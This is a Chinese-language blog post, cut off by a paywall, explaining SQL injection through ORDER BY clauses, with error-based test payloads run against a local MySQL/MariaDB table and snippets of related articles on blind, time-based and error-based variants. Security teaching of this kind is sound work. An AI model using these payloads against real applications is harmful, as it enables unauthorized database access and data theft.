Order by注入

最新推荐文章于 2024-05-13 03:42:40 发布
最新推荐文章于 2024-05-13 03:42:40 发布
阅读量4.1k 收藏 7
点赞数
分类专栏: sql注入 文章标签: mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/125551423
版权

Order by注入

order by注入顾名思义可控参数在oder by后,可能出现在排序功能,想象一个功能可以根据用户输入的参数选择排名榜单,例如通过商品的名称select * from test01 order by [name];或者通过商品的价格select * from test01 order by [price];

例如select * from test01 order by [args];

可以通过下面几个方法测试是否存在注入点:

利用报错

可以构造一些报错语句得到相关信息

regexp

select 1 regexp if(1=1,1,0x00) #正常显示
select 1 regexp if(1=2,1,0x00) #出现报错

这个在10.5.12-MariaDB-1已经不行了,而在mysql5.7还能使用

#10.5.12-MariaDB-1均正常显示
MariaDB [mysql]> select * from test01 order by (select 1 regexp if(1=1,1,0x00));
+----+----------+--------+
| id | username | passwd |
+----+----------+--------+
|  1 | admin    | 123456 |
|  2 | jack     | 123456 |
|  3 | jackk    | 678910 |
+----+----------+--------+

MariaDB [mysql]> select * from test01 order by (select 1 regexp if(1=2,1,0x00));
+----+----------+--------+
| id | username | passwd |
+----+----------+--------+
|  1 | admin    | 123456 |
|  2 | jack     | 123456 |
|  3 | jackk    | 678910 |
+----+----------+--------+

#mysql5.7.18则会报错
mysql> select * from test01 order by (select 1 regexp if(1=1,1,0x00));
+----+----------+--------+
| id | username | passwd |
+----+----------+--------+
|  1 | admin    | 123456 |
|  2 | jackk    | 678910 |
|  4 | jack     | 123456
最低0.47元/天 解锁文章
小莫神和他的的
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
order by注入
weixin_49472648的博客
08-11 643
当页面出现mysql报错信息时,注入点在order by后面,此时可以利用报错信息进行注入。即可控的位置在order by 子句后面。如下图所示,这是正常的order by语句。le |le |
SQL注入ORDER BY注入
m0_74834253的博客
02-22 2101
使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注。order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。
SQL注入ORDER BY注入_order by sql注入问题
最新发布
2401_84970069的博客
05-13 806
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
order by 注入
硫酸超的博客
08-07 2457
order by 注入前言直接添加注入语句利用一些函数利用 andorderby stacked injection 前言 尝试?sort=1 desc 或者 asc,显示结果不同,则表明可以注入。(升序 or 降序排列) 从上述的 sql 语句中我们可以看出,我们的注入点在 order by 后面的参数中,而 order by 不同于的我们在 where 后的注入点,不能使用 union 等进行注入。 如果order by '1’显示的是默认排序 直接添加注入语句 ?sort=(select ******
mysql order by注入_sql注入order by注入
weixin_28882177的博客
01-19 4784
0x00 前言夜里看了一篇文章,突然有了启发,赶紧记录一下。了解order by参考:order by是mysql中对查询数据进行排序的方法, 使用示例select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序这里的重点在于order by后既可以填列名或者是一个数字。举个例子:...
mysql oder by 注入_orderby 注入
weixin_42298415的博客
01-27 790
0x01 介绍顾名思义,注入点出现在oder by后面即可称为order by 注入正常的oder by 语句:select * from users order by id desc;当desc此处位置参数可控时,即有可能存在oreder by注入,那么如何在这样的情况下注出我们想要的数据呢?1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击2.如果没有回显,可尝试盲注的手法来注入0x...
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8647
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入order by if()注入order by sleep()注入order by报错注入
order by注入与limit注入
lml_0916的博客
08-08 1728
数据库中,order by的作用是对数据表中查询的数据进行排序的方式。正常情况下我们去查询一个数据库的时候,它显示的顺序可能是根据插入的数据来进行排序的,所以可以通过order by进行排序,方便查看select * from 表名 order by 列名(数字) asc;(升序的) select * from 表名 order by 列名(数字) desc;(降序的)举个例子:正常情况下,用户表的排名是这样的当我们使用命令。...
sql注入order by注入
qq_45627785的博客
08-05 4657
Jan 1, 0001 00:00 · 427 words · 3 minute readCTF 了解order by order by盲注 结合union来盲注 基于if()盲注 需要知道列名 不需要知道列名 基于时间的盲注 基于rang()的盲注 order by 报错注入 updatexml extractvalue 在安恒杯看到了利用order by进行盲注,记得自己之前好像总结过order by后的注入方法,翻..
OrderbyHunter:一款辅助探测Orderby注入漏洞的BurpSuite插件,Python3编写,适用于上xray等扫描器被ban的场景
05-16
一款辅助探测Orderby注入漏洞的BurpSuite插件,Python3编写,适用于上xray等扫描器被ban的场景 1. 支持Get/Post型请求参数的探测,被动探测,对于存在Orderby注入的请求将会在HTTP Histroy里标红 2. 自定义排序参数...
sqlmap sql 注入测试工具
03-06
- 技术细节:SQLMap会尝试各种注入技术,包括但不限于ORDER BY注入、UNION SELECT注入、堆叠查询注入等,以找到最有效的注入点。 4. 安全测试流程: - 预备阶段:了解目标网站的结构,确定可能的注入点。 - 扫描...
sql注入讲解ppt.pptx
08-10
3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET keyword 来限制查询结果。 八、SQL 注入基本步骤: 1. 注入点测试:检测 SQL 注入的可能性。 2. 查询字段数:...
mysql注入-sqlilabs靶场注入
10-15
例如,使用UNION查询在已知列数的场景下合并结果,使用注释符号来隐藏部分SQL代码,或者利用ORDER BY和LIMIT来枚举列数和行数。此外,还有二进制注入,通过ASCII值转换来插入特殊字符,以及使用存储过程和函数来执行...
php手工注入.doc
11-29
接着,通过`Order by 47`和`Order by 48`的测试,确定了数据库字段的数量为47个。 进一步,攻击者利用`UNION SELECT`构造了一条查询,显示了页面上的部分字段。他们使用了几个常见的MySQL函数,如`version()`来获取...
二X注入
qq_40710190的博客
10-22 554
二X注入 这是关于各种2种带二的SQL注入。 二阶注入 当数据首次插入到数据库中时,许多应用程序能够安全处理这些数据;addslashes() 等字符转义函数。 一旦数据存储在数据库中,随后应用程序本身或其它后端进程可能会以危险的方式处理这些数据 。 许多这类应用并不像面向因特网的主要应用程序一样安全,却拥有较高权限的数据库账户。 第一次HTTP请求是精心构造的,为第二次HTTP请求触发漏洞做准备。 使用Burp和自定义Sqlmap Tamper利用二次注入漏洞 简单来说,二阶注入就是在第一次数据插入数据
不再显示错误的盲注
qq_40710190的博客
10-13 436
不再显示错误的盲注 意外的收获 我在对lesson1重新测试单双引号闭合的时候发现了一个有趣的问题。 lesson1的sql源码是 SELECT * FROM users WHERE id='$id' LIMIT 0,1 但是我惊讶的发现我单纯用双引号也能正确的查询 原来如此 下面用这样的table来进行实例讲解. id name 0 admin0 1 admin1 因为SQL在遇到这种情况是会自动转换为int类型比较,如果该字段是int的话。 select * from `us
GET基于报错的注入
qq_40710190的博客
10-15 399
GET基于报错的注入 报错注入形式上是两个嵌套的查询,即select…(select…),里面的select被称为子查询,他的执行顺序也是先执行子查询,再执行外面的select,双注入主要涉及到了几个SQL函数: rand()随机函数,返回0~1之间的某个值 floor(a) 取整函数,返回小于等于a,且值最接近a的一个整数 count()聚合函数也称作计数函数,返回查询对象的总数 SQL COUNT(*) 函数 定义和用法 COUNT(*) 函数返回在给定的选择中被选的行数。 语法 SE
SQL注入WAF绕过策略
qq_40710190的博客
10-24 338
SQL注入WAF绕过策略 为了防止sql注入的安全问题,安全过滤应运而生。在php中的一个string匹配的函数preg_match便是如此。 先来PHP manual看看preg_match是什么吧 preg_match 说到preg_match就不得不提到正则表达式,JS中的正则表达式或者自行上网学习。然后提供一个在线的正则匹配网站还是非常不错的https://regex101.com/ ok接下来进入讲解, 1.架构层绕过WAF 寻找源站——>针对云WAF 云WAF是假设非嵌入式的,所有访问
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值